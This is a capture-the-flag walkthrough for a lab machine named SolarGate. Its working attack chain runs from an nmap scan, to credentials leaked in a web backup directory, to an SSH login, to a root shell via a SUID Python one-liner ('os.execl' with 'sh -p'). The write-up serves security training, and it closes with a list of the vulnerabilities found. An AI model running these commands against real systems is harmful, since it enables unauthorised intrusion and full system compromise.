1. nmap -sV -p 30605,30606 172.105.154.30

2. 172.105.154.30:30606/backup/creds.txt

3. ssh login .... cat user.txt

4. nmap -sV -p 30605,30606 172.105.154.30 >>>>>> SimpleHTTPServer 0.6 (Python 3.8.10) >>>>>> /usr/bin/python3.8 -c 'import os; os.execl("/bin/sh", "sh", "-p")' >>>>>>> root access

5. cat /root/root.txt

1. Reconnaissance (Port Scanning)

You start with:

SSH on non-standard port
HTTP SimpleHTTPServer
nmap -sV -p 30605,30606
Key findings:
30605 → SSH (OpenSSH 8.2p1 Ubuntu)
30606 → HTTP (Python SimpleHTTPServer)

Important insight:
This is a lab-style misconfiguration challenge, so HTTP is likely your entry point.

1. Web Enumeration

Opening the HTTP service shows:

Directory listing enabled
Two main items:
backup/
index.txt
Why this matters:

Directory listing = information disclosure vulnerability

You now enumerate further:

curl http://:30606/backup/creds.txt
3. Credential Discovery

Inside the backup directory, you find:

A credentials file containing:
username
password
Security issue:

This is a classic:

Sensitive data exposed in web-accessible backup directory

1. Initial Access (SSH Login)

Use the leaked credentials:

ssh -p 30605 username@

After authentication:

You get a normal Linux shell
System is Ubuntu minimal install
5. User Enumeration

Inside the home directory:

ls
cat user.txt

You confirm:

You have user-level access
No sudo privileges:
sudo -l

Result:

User is NOT allowed sudo
6. Privilege Escalation Discovery

You search for SUID binaries:

find / -perm -4000 -type f 2>/dev/null
Critical finding:

Among standard binaries, you notice:

/usr/bin/python3.8 has SUID bit set

This is highly dangerous and unusual.

1. Root Privilege Escalation (SUID Python Abuse)

Since Python runs with elevated privileges, you can spawn a shell:

/usr/bin/python3.8 -c 'import os; os.execl("/bin/sh", "sh", "-p")'
Why this works:
-p preserves privileges
Python inherits root effective UID due to SUID
8. Root Access

Now you are:

Root user shell obtained

You verify by accessing:

/root/root.txt

Attack Chain Summary
Nmap scan
↓
HTTP directory listing
↓
backup creds found
↓
SSH login (user access)
↓
SUID enumeration
↓
Python SUID abuse
↓
Root shell

Walkthrough: SolarGate

Challenge Description:
A solar monitoring platform exposes a web service that is a little too helpful. Gain an initial foothold through exposed resources, then leverage a misconfigured SUID binary to obtain root access.

1. Enumeration

The initial Nmap scan reveals two open ports:

• 30605/tcp – SSH
• 30606/tcp – HTTP (Python SimpleHTTPServer)

nmap -sV -p 30605,30606 23.92.29.178

Output

PORT      STATE SERVICE VERSION
30605/tcp open  ssh     OpenSSH 8.2p1 Ubuntu
30606/tcp open  http    SimpleHTTPServer 0.6 (Python 3.8.10)

Since the challenge description references a web service, the HTTP service is the primary target for further enumeration.

2. Web Enumeration

Request the root page:

curl -i http://23.92.29.178:30606/

Response

<title>Directory listing for /</title>

backup/
index.txt

The server has directory listing enabled, exposing a backup/ directory.

3. Credential Disclosure

Inspect files within the exposed backup directory:

curl http://23.92.29.178:30606/backup/creds.txt

Output

# SolarGate credential backup — DO NOT COMMIT
username=s...r
password=s....!

A credential backup file has been accidentally exposed through the web server.

4. Initial Access

Use the discovered credentials to authenticate via SSH.

ssh solar@23.92.29.178 -p 30605

Password:

s....!

Login is successful.

5. User Enumeration

List the contents of the user's home directory:

ls

Output

notes.txt
todo.txt
user.txt

Retrieve the user flag:

cat user.txt

User Flag

flag{...._...._...}

Review the remaining files for useful information:

cat notes.txt
cat todo.txt

notes.txt

Solar panel monitoring data archived daily.
Contact admin@solargate.local for access issues.

todo.txt

TODO: remove python suid flag — IT keeps using it for quick scripts. -- mgmt

The TODO note strongly suggests a privilege escalation path involving a SUID Python interpreter.

6. SUID Enumeration

Enumerate SUID binaries:

find / -perm -4000 -type f 2>/dev/null

Relevant Output

/usr/bin/python3.8

A Python interpreter should never normally have the SUID bit set. This is likely the intended privilege escalation vector.

7. Verify SUID Python

Check the effective UID of the interpreter:

/usr/bin/python3.8 -c 'import os; print(os.geteuid())'

Output

0

The interpreter executes with root privileges.

8. Privilege Escalation

Spawn a root shell using the SUID Python binary:

/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash -p")'

Verify access:

id

Output

uid=0(root) gid=1000(solar) euid=0(root)

Root access has been obtained.

9. Capture Root Flag

Navigate to the root directory:

cd /root
ls

Output

root.txt

Read the flag:

cat root.txt

Root Flag

flag{...._...._...}

Flags

User

flag{...._...._...}

Root

flag{...._...._...}

Attack Path Summary

1. Enumerated open services with Nmap.
2. Identified an exposed Python HTTP server.
3. Discovered directory listing was enabled.
4. Accessed a backup directory containing credentials.
5. Reused credentials to gain SSH access.
6. Retrieved the user flag.
7. Found a hint referencing a SUID Python interpreter.
8. Enumerated SUID binaries and located /usr/bin/python3.8.
9. Leveraged SUID Python to spawn a root shell.
10. Retrieved the root flag.

Vulnerabilities Identified

• Directory listing enabled on web server.
• Sensitive backup files exposed over HTTP.
• Plaintext credential storage.
• Credential reuse between services.
• Misconfigured SUID Python interpreter.
• Direct privilege escalation to root.

Impact: Full compromise of the target system from anonymous web access to root privileges.